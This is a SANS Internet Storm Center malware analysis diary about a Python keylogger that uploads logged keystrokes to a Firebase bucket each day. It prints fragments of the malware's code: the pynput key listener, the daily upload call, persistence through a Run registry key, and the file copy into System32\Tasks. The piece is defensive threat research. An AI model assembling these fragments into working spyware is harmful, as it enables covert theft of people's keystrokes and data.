Last week, I posted a diary about suspicious Python modules. One of them was Firebase [1], the cloud service provided by Google[2]. Firebase services abused by attackers is not new, usually, it’s used to host malicious files that will be available to download[3]. This is a nice location because who will think that a Google link is malicious?
Today, while reviewing my hunting results, I found an interesting Python script (again!) that relies on Firebase but this time to exfiltrate data. Unfortunately, the file was stand-alone and I missed the JSON file containing the credentials to connect to the Firebase account. The file “iLoveYou.py” has a low score on VT (2/65) (SHA256:ec88244d7b037306bdb53d60f2a709af13ca74d15937d9901c8cd90bc00720f6)[4]
The file is a classic keylogger. Very easy to implement in Python using pyinput[5]:
from pynput.keyboard import Key, Listener
…
with Listener(on_press=tus_basildi) as listener:
listener.join()
Every key press will generate a call to the function tus_basildi(). Note: the variable names are based on Turkish words
This keylogger has been implemented in a “funny” way: Key presses are logged and stored in a temporary file. But the file will be exfiltrated daily at 23:59:
current_time = time.strftime(“%H:%M”)
if current_time == “23.59”:
if sayac == 0:
blob = bucket.blob(bulut_path)
blob.upload_from_filename(yerel_dosya)
sayac = 1
Another funny fact: The script is buggy! Once the file has been exfiltrated at 23:59, the variable ‘savac’ will be set to 1 but never reset. If the script runs for over 24 hours, it will never exfiltrate the file again. Maybe the attacker expects the victim to log in every day?
Persistence is implemented classically via a Run key:
def reg_olustur(nereye_koyucam, adi_ne_bunun, ne_yapicak_bu_sey):
elektar = winreg.OpenKey(winreg.HKEY_CURRENT_USER, nereye_koyucam, 0, winreg.KEY_WRITE)
winreg.SetValueEx(elektar, adi_ne_bunun, 0, winreg.REG_SZ, ne_yapicak_bu_sey)
winreg.CloseKey(elektar)
nereye_koycam = “SoftwareMicrosoftWindowsCurrentVersionRun”
adi_ne_bunun = bilgisayar_adi
ne_yapicak_bu_sey = f”C:WindowsSystem32Tasksiloveyou.exe”
reg_olustur(nereye_koycam, adi_ne_bunun, ne_yapicak_bu_sey)
The fact that an executable will be launched at login time, this Python script will probably be compiled. It should copy itself in the Tasks directory:
kaynak_dosya = ‘iloveyou.exe’
hedef_dizin = ‘C:WindowsSystem32Tasks’
shutil.copy(kaynak_dosya, hedef_dizin)
I tried to find the executable, without luck! But I found a previous version of the script, created a few days before (SHA256:43a4d56c11a12de13b8d2186daf5b00d793076fb47afcee5ecd0b327a634e150)
[1] https://pypi.org/project/firebase/
[2] https://firebase.google.com/solutions
[3] https://isc.sans.edu/diary/Recent+IcedID+Bokbot+activity/29740
[4] https://www.virustotal.com/gui/file/ec88244d7b037306bdb53d60f2a709af13ca74d15937d9901c8cd90bc00720f6
[5] https://pypi.org/project/pynput/
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.